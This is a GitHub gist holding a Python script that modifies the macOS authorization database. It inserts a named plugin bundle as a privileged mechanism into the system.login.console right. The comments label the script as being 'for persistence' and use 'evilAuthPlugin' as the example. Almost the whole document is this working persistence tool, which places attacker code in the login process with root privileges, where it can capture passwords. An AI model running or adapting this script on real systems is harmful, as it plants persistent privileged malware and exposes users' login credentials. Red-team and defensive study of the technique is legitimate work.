python script to install authorization plugin that requests system.login.console right
#!/usr/bin/python | |
# install authorization plugin for persistence. | |
# orginal script here: https://github.com/chilcote/pylab/blob/070c328bc4929e7e7042f6bd1e42d2700abb05e4/auth_db.py | |
# system.login.console right should be used for auth plugins | |
# ex: installplugin.py evilAuthPlugin | |
import sys | |
import objc | |
from ctypes import CDLL, c_void_p, byref, c_char_p | |
from ctypes.util import find_library | |
from PyObjCTools import Conversion | |
Security = CDLL(find_library("Security.framework")) | |
AuthorizationRightSet = Security.AuthorizationRightSet | |
AuthorizationRightGet = Security.AuthorizationRightGet | |
AuthorizationCreate = Security.AuthorizationCreate | |
def authorization_right_get(right): | |
db_buffer = c_void_p() | |
AuthorizationRightGet(right, byref(db_buffer)) | |
if db_buffer: | |
return objc.objc_object(c_void_p=db_buffer).mutableCopy() | |
return None | |
def authorization_right_set(right, value): | |
auth_ref = c_void_p() | |
AuthorizationCreate(None, None, 0, byref(auth_ref)) | |
return AuthorizationRightSet(auth_ref, right, value.__c_void_p__(), None, None, None) | |
if __name__ == '__main__': | |
if len(sys.argv) < 2: | |
print "Please provide the bundle name, without the extension" | |
sys.exit(0) | |
bundle = sys.argv[1] | |
authright = "system.login.console" | |
db = authorization_right_get(authright) | |
i = db["mechanisms"].index("HomeDirMechanism:status") #Get the position of the last HomeDirMechanism | |
mechanismValue = u"{}:login,privileged".format(bundle) | |
# Convert the pyobjc object to a python object, something we can change | |
writeableDB = Conversion.pythonCollectionFromPropertyList(db, conversionHelper=None) | |
writeableDB['mechanisms'].insert(i+1, mechanismValue) | |
db = Conversion.propertyListFromPythonCollection(writeableDB, conversionHelper=None) | |
# Update the authorization database | |
authorization_right_set(authright, db) | |
print "Done" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment